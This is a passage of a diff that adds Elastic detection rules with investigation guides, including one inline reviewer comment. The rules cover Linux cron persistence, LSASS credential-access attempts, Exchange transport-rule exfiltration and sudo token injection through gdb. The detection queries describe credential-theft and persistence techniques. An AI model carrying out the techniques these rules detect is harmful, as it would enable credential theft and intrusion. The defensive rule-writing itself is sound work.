port, socket, protocol, path FROM listening_ports\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Open Sockets\",\"query\":\"SELECT pid, family, remote_address, remote_port, socket, state FROM process_open_sockets\"}}\n - Identify the user account that performed the action, analyze it, and check whether it should perform this kind of action.\n - !{osquery{\"label\":\"Osquery - Retrieve Information for a Specific User\",\"query\":\"SELECT * FROM users WHERE username = {{user.name}}\"}}\n- Investigate whether the user is currently logged in and active.\n - 
!{osquery{\"label\":\"Osquery - Investigate the Account Authentication Status\",\"query\":\"SELECT * FROM logged_in_users WHERE user = {{user.name}}\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses cron jobs for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Related Rules\n\n- Suspicious File Creation in /etc for Persistence - 1c84dd64-7e6c-4bad-ac73-a5014ee37042\n- Potential Persistence Through Run Control Detected - 0f4d35e4-925e-4959-ab24-911be207ee6f\n- Potential Persistence Through init.d Detected - 474fd20e-14cc-49c5-8160-d9ab4ba16c8b\n- New Systemd Timer Created - 7fb500fa-8e24-4bd1-9480-2a819352602c\n- New Systemd Service Created by Previously Unknown Process - 17b0a495-4d9f-414c-8ad0-92f018b8e001\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are 
identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service/timer or restore its original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "host.os.type : \"linux\" and event.action : (\"change\" or \"file_modify_event\" or \"creation\" or \"file_create_event\") and \nfile.path : (/etc/cron.allow or /etc/cron.deny or /etc/cron.d/* or /etc/cron.hourly/* or /etc/cron.daily/* or \n/etc/cron.weekly/* or /etc/cron.monthly/* or /etc/crontab or /usr/sbin/cron or /usr/sbin/anacron) \nand not (\n (process.name : (\"dpkg\" or \"dockerd\" or \"rpm\" or \"snapd\" or \"yum\" or \"exe\" or \"dnf\" or \"podman\" or \n \"dnf-automatic\" or puppet or autossl_check )) or \n (file.extension : (\"swp\" or \"swpx\")) or \n (process.name : \"sed\" and file.name : sed*) or \n (process.name : \"perl\" and file.name : e2scrub_all.tmp*) or\n (process.executable : /var/lib/dpkg*)\n)\n", + "references": [ + "https://pberba.github.io/security/2022/01/30/linux-threat-hunting-for-persistence-systemd-timers-cron/" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": 
"keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ff10d4d8-fea7-422d-afb1-e5a2702369a9", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
If other agent policies already exist, you can click the \"Existing hosts\" tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click \"Save and Continue\".\n- To complete the integration, select \"Add Elastic Agent to your hosts\" and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Privilege Escalation", + "Tactic: Execution", + "Data Source: Elastic Endgame", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.003", + "name": "Cron", + "reference": "https://attack.mitre.org/techniques/T1053/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": "https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.003", + "name": "Cron", + "reference": "https://attack.mitre.org/techniques/T1053/003/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1053", + "name": "Scheduled Task/Job", + "reference": 
"https://attack.mitre.org/techniques/T1053/", + "subtechnique": [ + { + "id": "T1053.003", + "name": "Cron", + "reference": "https://attack.mitre.org/techniques/T1053/003/" + } + ] + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "new_terms", + "version": 9 + }, + "id": "ff10d4d8-fea7-422d-afb1-e5a2702369a9_9", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ff4599cb-409f-4910-a239-52e4e6f532ff_7.json b/packages/security_detection_engine/kibana/security_rule/ff4599cb-409f-4910-a239-52e4e6f532ff_7.json new file mode 100644 index 00000000000..c0c105eaae2 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ff4599cb-409f-4910-a239-52e4e6f532ff_7.json 
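Review bot: The investigation guide in the `note` field carries two copy-paste leftovers from the systemd-timer rule that should be fixed in this rule's new version. The second Osquery block is labelled `"Osquery - Retrieve rc-local.service File Information"` although its query lists `/etc/cron.allow`, `/etc/cron.deny`, `/etc/crontab`, `/usr/sbin/cron` and `/usr/sbin/anacron`; a label such as `"Osquery - Retrieve Cron Configuration File Information"` matches what the query returns. In the remediation section, `"- Delete the service/timer or restore its original configuration."` refers to a systemd unit, whereas this rule fires on cron files, so `"- Delete the cron job or restore its original configuration."` is the intended step. Since the query already lists `process.executable` among `new_terms_fields`, the name-only exclusions (`"exe"`, `puppet`, `autossl_check`) are presumably weaker than path-anchored ones; pairing them with a `process.executable` condition, as is done for `/var/lib/dpkg*`, would narrow the exclusion surface.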
@@ -0,0 +1,108 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies access attempts to the LSASS handle, which may indicate an attempt to dump credentials from LSASS memory.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.api-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "LSASS Process Access via Windows API", + "note": "## Triage and analysis\n\n### Investigating LSASS Process Access via Windows API\n\nThe Local Security Authority Subsystem Service (LSASS) is a critical Windows component responsible for managing user authentication and security policies. Adversaries may attempt to access the LSASS handle to dump credentials from its memory, which can be used for lateral movement and privilege escalation.\n\nThis rule identifies attempts to access LSASS by monitoring for specific API calls (OpenProcess, OpenThread) targeting the \"lsass.exe\" process.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. 
Older Elastic Stack versions will display unrendered Markdown in this guide.\n\n### Possible investigation steps\n\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Investigate the process execution chain (parent process tree) of the process that accessed the LSASS handle.\n - Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures.\n - Determine the first time the process executable was seen in the environment and if this behavior happened in the past.\n - Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n - Investigate any abnormal behavior by the subject process, such as network connections, DLLs loaded, registry or file modifications, and any spawned child processes.\n- Assess the access rights (`process.Ext.api.parameters.desired_access`field) requested by the process. This [Microsoft documentation](https://learn.microsoft.com/en-us/windows/win32/procthread/process-security-and-access-rights) may be useful to help the interpretation.\n- If there are traces of LSASS memory being successfully dumped, investigate potentially compromised accounts. 
Analysts can do this by searching for login events (e.g., 4624) to the target host.\n- Examine the host for derived artifacts that indicate suspicious activities:\n - Analyze the executables of the processes using a private sandboxed analysis system.\n - Observe and collect information about the following activities in both the sandbox and the alert subject host:\n - Attempts to contact external domains and addresses.\n - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process's `process.entity_id`.\n - Examine the DNS cache for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve DNS Cache\",\"query\":\"SELECT * FROM dns_cache\"}}\n - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree.\n - Examine the host services for suspicious or anomalous entries.\n - !{osquery{\"label\":\"Osquery - Retrieve All Services\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Services Running on User Accounts\",\"query\":\"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\\nuser_account == null)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Service Unsigned Executables with Virustotal Link\",\"query\":\"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\\n\"}}\n - Retrieve the files' SHA-256 hash values using the 
PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc.\n\n\n### False positive analysis\n\n- If this rule is noisy in your environment due to expected activity, consider adding exceptions \u2014 preferably with a combination of `process.executable`, `process.code_signature.subject_name` and `process.Ext.api.parameters.desired_access_numeric` conditions.\n\n### Related Rules\n\n- Suspicious Lsass Process Access - 128468bf-cab1-4637-99ea-fdf3780a4609\n- Potential Credential Access via DuplicateHandle in LSASS - 02a4576a-7480-4284-9327-548a806b5e48\n- LSASS Memory Dump Handle Access - 208dbe77-01ed-4954-8d44-1e5751cb20de\n\n### Response and Remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n - If malicious activity is confirmed, perform a broader investigation to identify the scope of the compromise and determine the appropriate remediation steps.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Remove and block malicious artifacts identified during triage.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Run a full antimalware scan. 
This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Reimage the host operating system or restore the compromised files to clean versions.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "query": "api where host.os.type == \"windows\" and \n process.Ext.api.name in (\"OpenProcess\", \"OpenThread\") and Target.process.name : \"lsass.exe\" and \n not \n (\n process.executable : (\n \"?:\\\\ProgramData\\\\GetSupportService*\\\\Updates\\\\Update_*.exe\",\n \"?:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\*\\\\MsMpEng.exe\",\n \"?:\\\\Program Files (x86)\\\\Asiainfo Security\\\\OfficeScan Client\\\\NTRTScan.exe\",\n \"?:\\\\Program Files (x86)\\\\Blackpoint\\\\SnapAgent\\\\SnapAgent.exe\",\n \"?:\\\\Program Files (x86)\\\\eScan\\\\reload.exe\",\n \"?:\\\\Program Files (x86)\\\\Google\\\\Update\\\\GoogleUpdate.exe\",\n \"?:\\\\Program Files (x86)\\\\Kaspersky Lab\\\\*\\\\avp.exe\",\n \"?:\\\\Program Files (x86)\\\\N-able Technologies\\\\Reactive\\\\bin\\\\NableReactiveManagement.exe\",\n \"?:\\\\Program Files (x86)\\\\N-able Technologies\\\\Windows Agent\\\\bin\\\\agent.exe\",\n \"?:\\\\Program Files (x86)\\\\Trend Micro\\\\*\\\\CCSF\\\\TmCCSF.exe\",\n \"?:\\\\Program Files*\\\\Windows Defender\\\\MsMpEng.exe\",\n \"?:\\\\Program Files\\\\Bitdefender\\\\Endpoint Security\\\\EPSecurityService.exe\",\n \"?:\\\\Program Files\\\\Cisco\\\\AMP\\\\*\\\\sfc.exe\",\n \"?:\\\\Program Files\\\\Common Files\\\\McAfee\\\\AVSolution\\\\mcshield.exe\",\n \"?:\\\\Program Files\\\\EA\\\\AC\\\\EAAntiCheat.GameService.exe\",\n \"?:\\\\Program Files\\\\Elastic\\\\Agent\\\\data\\\\elastic-agent-*\\\\components\\\\metricbeat.exe\",\n \"?:\\\\Program 
Files\\\\Elastic\\\\Agent\\\\data\\\\elastic-agent-*\\\\components\\\\osqueryd.exe\",\n \"?:\\\\Program Files\\\\Elastic\\\\Agent\\\\data\\\\elastic-agent-*\\\\components\\\\packetbeat.exe\",\n \"?:\\\\Program Files\\\\ESET\\\\ESET Security\\\\ekrn.exe\",\n \"?:\\\\Program Files\\\\Fortinet\\\\FortiClient\\\\FortiProxy.exe\",\n \"?:\\\\Program Files\\\\Huntress\\\\HuntressAgent.exe\",\n \"?:\\\\Program Files\\\\LogicMonitor\\\\Agent\\\\bin\\\\sbshutdown.exe\",\n \"?:\\\\Program Files\\\\Microsoft Security Client\\\\MsMpEng.exe\",\n \"?:\\\\Program Files\\\\Qualys\\\\QualysAgent\\\\QualysAgent.exe\",\n \"?:\\\\Program Files\\\\TDAgent\\\\ossec-agent\\\\ossec-agent.exe\",\n \"?:\\\\Program Files\\\\Topaz OFD\\\\Warsaw\\\\core.exe\",\n \"?:\\\\Program Files\\\\VMware\\\\VMware Tools\\\\vmtoolsd.exe\",\n \"?:\\\\Windows\\\\AdminArsenal\\\\PDQDeployRunner\\\\*\\\\exec\\\\Sysmon64.exe\",\n \"?:\\\\Windows\\\\Sysmon.exe\",\n \"?:\\\\Windows\\\\Sysmon64.exe\",\n \"?:\\\\Windows\\\\System32\\\\csrss.exe\",\n \"?:\\\\Windows\\\\System32\\\\MRT.exe\",\n \"?:\\\\Windows\\\\System32\\\\msiexec.exe\",\n \"?:\\\\Windows\\\\System32\\\\RtkAudUService64.exe\",\n \"?:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe\",\n \"?:\\\\Windows\\\\SysWOW64\\\\wbem\\\\WmiPrvSE.exe\"\n ) and process.code_signature.trusted == true\n )\n", + "references": [ + "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.001/T1003.001.md" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "Target.process.name", + "type": "unknown" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.Ext.api.name", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.code_signature.trusted", + "type": "boolean" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": 
"ff4599cb-409f-4910-a239-52e4e6f532ff", + "severity": "medium", + "tags": [ + "Domain: Endpoint", + "OS: Windows", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Tactic: Execution", + "Data Source: Elastic Defend" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0006", + "name": "Credential Access", + "reference": "https://attack.mitre.org/tactics/TA0006/" + }, + "technique": [ + { + "id": "T1003", + "name": "OS Credential Dumping", + "reference": "https://attack.mitre.org/techniques/T1003/", + "subtechnique": [ + { + "id": "T1003.001", + "name": "LSASS Memory", + "reference": "https://attack.mitre.org/techniques/T1003/001/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0002", + "name": "Execution", + "reference": "https://attack.mitre.org/tactics/TA0002/" + }, + "technique": [ + { + "id": "T1106", + "name": "Native API", + "reference": "https://attack.mitre.org/techniques/T1106/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 7 + }, + "id": "ff4599cb-409f-4910-a239-52e4e6f532ff_7", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ff4dd44a-0ac6-44c4-8609-3f81bc820f02_103.json b/packages/security_detection_engine/kibana/security_rule/ff4dd44a-0ac6-44c4-8609-3f81bc820f02_103.json new file mode 100644 index 00000000000..34730c50592 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ff4dd44a-0ac6-44c4-8609-3f81bc820f02_103.json 
@@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a transport rule creation in Microsoft 365. As a best practice, Exchange Online mail transport rules should not be set to forward email to domains outside of your organization. An adversary may create transport rules to exfiltrate data.", + "false_positives": [ + "A new transport rule may be created by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange Transport Rule Creation", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"New-TransportRule\" and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/new-transportrule?view=exchange-ps", + "https://docs.microsoft.com/en-us/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ff4dd44a-0ac6-44c4-8609-3f81bc820f02", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Exfiltration" + ], + "threat": [ + { + 
"framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1537", + "name": "Transfer Data to Cloud Account", + "reference": "https://attack.mitre.org/techniques/T1537/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 103 + }, + "id": "ff4dd44a-0ac6-44c4-8609-3f81bc820f02_103", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ff4dd44a-0ac6-44c4-8609-3f81bc820f02_105.json b/packages/security_detection_engine/kibana/security_rule/ff4dd44a-0ac6-44c4-8609-3f81bc820f02_105.json new file mode 100644 index 00000000000..e0e0287471d --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ff4dd44a-0ac6-44c4-8609-3f81bc820f02_105.json 
@@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a transport rule creation in Microsoft 365. As a best practice, Exchange Online mail transport rules should not be set to forward email to domains outside of your organization. An adversary may create transport rules to exfiltrate data.", + "false_positives": [ + "A new transport rule may be created by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange Transport Rule Creation", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"New-TransportRule\" and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/new-transportrule?view=exchange-ps", + "https://docs.microsoft.com/en-us/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ff4dd44a-0ac6-44c4-8609-3f81bc820f02", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Exfiltration" + ], + "threat": [ + { + 
"framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1537", + "name": "Transfer Data to Cloud Account", + "reference": "https://attack.mitre.org/techniques/T1537/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 105 + }, + "id": "ff4dd44a-0ac6-44c4-8609-3f81bc820f02_105", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ff4dd44a-0ac6-44c4-8609-3f81bc820f02_206.json b/packages/security_detection_engine/kibana/security_rule/ff4dd44a-0ac6-44c4-8609-3f81bc820f02_206.json new file mode 100644 index 00000000000..539095d948c --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ff4dd44a-0ac6-44c4-8609-3f81bc820f02_206.json 
@@ -0,0 +1,90 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "Identifies a transport rule creation in Microsoft 365. As a best practice, Exchange Online mail transport rules should not be set to forward email to domains outside of your organization. An adversary may create transport rules to exfiltrate data.", + "false_positives": [ + "A new transport rule may be created by a system or network administrator. Verify that the configuration change was expected. Exceptions can be added to this rule to filter expected behavior." + ], + "from": "now-30m", + "index": [ + "filebeat-*", + "logs-o365*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Microsoft 365 Exchange Transport Rule Creation", + "note": "", + "query": "event.dataset:o365.audit and event.provider:Exchange and event.category:web and event.action:\"New-TransportRule\" and event.outcome:success\n", + "references": [ + "https://docs.microsoft.com/en-us/powershell/module/exchange/new-transportrule?view=exchange-ps", + "https://docs.microsoft.com/en-us/exchange/security-and-compliance/mail-flow-rules/mail-flow-rules" + ], + "related_integrations": [ + { + "package": "o365", + "version": "^2.0.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ff4dd44a-0ac6-44c4-8609-3f81bc820f02", + "setup": "The Office 365 Logs Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Domain: Cloud", + "Data Source: Microsoft 365", + "Use Case: Configuration Audit", + "Tactic: Exfiltration" + ], + "threat": [ + { + 
"framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0010", + "name": "Exfiltration", + "reference": "https://attack.mitre.org/tactics/TA0010/" + }, + "technique": [ + { + "id": "T1537", + "name": "Transfer Data to Cloud Account", + "reference": "https://attack.mitre.org/techniques/T1537/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 206 + }, + "id": "ff4dd44a-0ac6-44c4-8609-3f81bc820f02_206", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/ff9bc8b9-f03b-4283-be58-ee0a16f5a11b_5.json b/packages/security_detection_engine/kibana/security_rule/ff9bc8b9-f03b-4283-be58-ee0a16f5a11b_5.json new file mode 100644 index 00000000000..d99d88e8fc8 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/ff9bc8b9-f03b-4283-be58-ee0a16f5a11b_5.json 
@@ -0,0 +1,118 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "description": "This rule detects potential sudo token manipulation attacks through process injection by monitoring the use of a debugger (gdb) process followed by a successful uid change event during the execution of the sudo process. A sudo token manipulation attack is performed by injecting into a process that has a valid sudo token, which can then be used by attackers to activate their own sudo token. This attack requires ptrace to be enabled in conjunction with the existence of a living process that has a valid sudo token with the same uid as the current user.", + "from": "now-9m", + "index": [ + "logs-endpoint.events.*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Potential Sudo Token Manipulation via Process Injection", + "query": "sequence by host.id, process.session_leader.entity_id with maxspan=15s\n[ process where host.os.type == \"linux\" and event.type == \"start\" and event.action == \"exec\" and \n process.name == \"gdb\" and process.user.id != \"0\" and process.group.id != \"0\" ]\n[ process where host.os.type == \"linux\" and event.action == \"uid_change\" and event.type == \"change\" and \n process.name == \"sudo\" and process.user.id == \"0\" and process.group.id == \"0\" ]\n", + "references": [ + "https://github.com/nongiach/sudo_inject" + ], + "related_integrations": [ + { + "package": "endpoint", + "version": "^8.2.0" + } + ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + }, + { + "ecs": false, + "name": "process.group.id", + "type": "unknown" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.session_leader.entity_id", + "type": "keyword" + 
}, + { + "ecs": true, + "name": "process.user.id", + "type": "keyword" + } + ], + "risk_score": 47, + "rule_id": "ff9bc8b9-f03b-4283-be58-ee0a16f5a11b", + "setup": "## Setup\n\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows the Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click \"Add integrations\".\n- In the query bar, search for \"Elastic Defend\" and select the integration to see more details about it.\n- Click \"Add Elastic Defend\".\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either \"Traditional Endpoints\" or \"Cloud Workloads\".\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest selecting \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in \"New agent policy name\". 
